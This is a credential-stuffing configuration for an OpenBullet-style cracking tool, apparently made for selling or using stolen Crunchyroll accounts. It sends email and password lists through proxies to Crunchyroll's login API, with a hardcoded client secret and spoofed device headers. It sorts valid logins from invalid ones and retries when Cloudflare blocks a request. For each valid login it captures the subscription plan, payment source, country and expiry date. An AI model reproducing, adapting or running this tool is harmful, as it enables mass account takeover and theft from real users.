[SETTINGS]
{
  "Name": "CRUNCHYROLL FAST API",
  "SuggestedBots": 60,
  "MaxCPM": 0,
  "LastModified": "2025-07-30T12:49:16.7844805-03:00",
  "AdditionalInfo": "XSHOP",
  "RequiredPlugins": [],
  "Author": "XSHOP",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "CRUNCHYROLL FAST API",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<USER>" Contains "@" 
  KEYCHAIN Failure OR 
    KEY "<USER>" DoesNotContain "@" 

FUNCTION RandomString "?h?h?h?h?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "DeviceId" 

FUNCTION RandomString "?h?h?h?h?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "SESSION-ID" 

FUNCTION RandomString "?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "CLIENT-ID" 

REQUEST POST "https://beta-api.crunchyroll.com/auth/v1/token" 
  CONTENT "grant_type=password&username=<USER>&password=<PASS>&scope=offline_access&client_id=ajcylfwdtjjtq7qpgks3&client_secret=oKoU8DMZW7SAaQiGzUEdTQG4IimkL8I_&device_type=BosSHooTeR&device_id=<DeviceId>&device_name=BosSHoooTeR" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "etp-anonymous-id: <SESSION-ID>" 
  HEADER "User-Agent: Crunchyroll/deviceType: BosSHoooTeR; appVersion: 4.10.0; osVersion: 12; model: BosSHoooTeR; manufacturer: Amazon; brand: Amazo" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Charset: UTF-8" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Host: beta-api.crunchyroll.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "x-BosShooTeR: @BosShooTeR" 
  HEADER "x-BosSh: @BosSh" 
  HEADER "x-MarocainsCracking: @MarocainsCracking" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "auth.obtain_access_token.invalid_credentials" 
  KEYCHAIN Success OR 
    KEY "\"account_id\"" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "force_password_reset" 
  KEYCHAIN Retry OR 
    KEY "beta-api.crunchyroll.com used Cloudflare to restrict access" 

PARSE "<SOURCE>" LR "\"account_id\":\"" "\"" -> VAR "account_id" 

PARSE "<SOURCE>" LR "\"access_token\":\"" "\"" -> VAR "access_token" 

REQUEST GET "https://beta-api.crunchyroll.com/accounts/v1/me" 
  
  HEADER "Host: beta-api.crunchyroll.com" 
  HEADER "authorization: Bearer <access_token>" 
  HEADER "etp-anonymous-id: <SESSION-ID>" 
  HEADER "accept-encoding: gzip" 
  HEADER "if-modified-since: Sun, 14 Apr 2024 17:28:31 GMT" 
  HEADER "User-Agent: Crunchyroll/deviceType: BosSHooTeR; appVersion: 4.10.0; osVersion: 12; model: BosSHoooTeR; manufacturer: Amazon; brand: Amazo" 

PARSE "<SOURCE>" JSON "external_id" -> VAR "external_id" 

REQUEST GET "https://beta-api.crunchyroll.com/subs/v1/subscriptions/<external_id>/benefits" 
  
  HEADER "Host: beta-api.crunchyroll.com" 
  HEADER "authorization: Bearer <access_token>" 
  HEADER "etp-anonymous-id: <SESSION-ID>" 
  HEADER "accept-encoding: gzip" 
  HEADER "if-modified-since: Sun, 14 Apr 2024 17:28:31 GMT" 
  HEADER "User-Agent: Crunchyroll/deviceType: BosSHooTeR; appVersion: 4.10.0; osVersion: 12; model: BosSHoooTeR; manufacturer: Amazon; brand: Amazo" 

PARSE "<SOURCE>" LR ",\"subscription_country\":\"" "\"" CreateEmpty=FALSE -> CAP "Country" 

REQUEST GET "https://beta-api.crunchyroll.com/subs/v3/subscriptions/<account_id>" 
  
  HEADER "Host: beta-api.crunchyroll.com" 
  HEADER "authorization: Bearer <access_token>" 
  HEADER "etp-anonymous-id: <SESSION-ID>" 
  HEADER "accept-encoding: gzip" 
  HEADER "if-modified-since: Sun, 14 Apr 2024 17:28:31 GMT" 
  HEADER "User-Agent: Crunchyroll/deviceType: BosSHooTeR; appVersion: 4.10.0; osVersion: 12; model: BosSHoooTeR; manufacturer: Amazon; brand: Amazo" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "Subscription Not Found" 
    KEY "subscription.not_found" 
  KEYCHAIN Success OR 
    KEY ",\"source\":\"" 
    KEY "\"tier\":\"" 

PARSE "<SOURCE>" LR ",\"tier\":\"" "\"" -> VAR "Plans" 

FUNCTION Translate 
  KEY "fan_pack" VALUE "Mega Fan Plan" 
  KEY "super_fan_pack" VALUE "Ultimate Fan Plan" 
  KEY "premium" VALUE "Fan Plan" 
  "<Plans>" -> CAP "Plan" 

PARSE "<SOURCE>" LR "\"auto_renew\":" "," CreateEmpty=FALSE -> CAP "Auto-Renew" 

PARSE "<SOURCE>" LR "\"active_free_trial\":" "}" CreateEmpty=FALSE -> CAP "Free-Trial" 

PARSE "<SOURCE>" LR ",\"source\":\"" "\"" CreateEmpty=FALSE -> CAP "Payment-Methode" 

PARSE "<SOURCE>" LR ",\"expiration_date\":\"" "T" CreateEmpty=FALSE -> CAP "Expiry-Date" 

FUNCTION DateToUnixTime "yyyy-MM-dd" "<Expiry-Date>" -> VAR "Expiry-Dates" 

FUNCTION CurrentUnixTime -> VAR "DateNow" 

FUNCTION Constant "XSHOPVERIFY" -> CAP "MADE BY" 

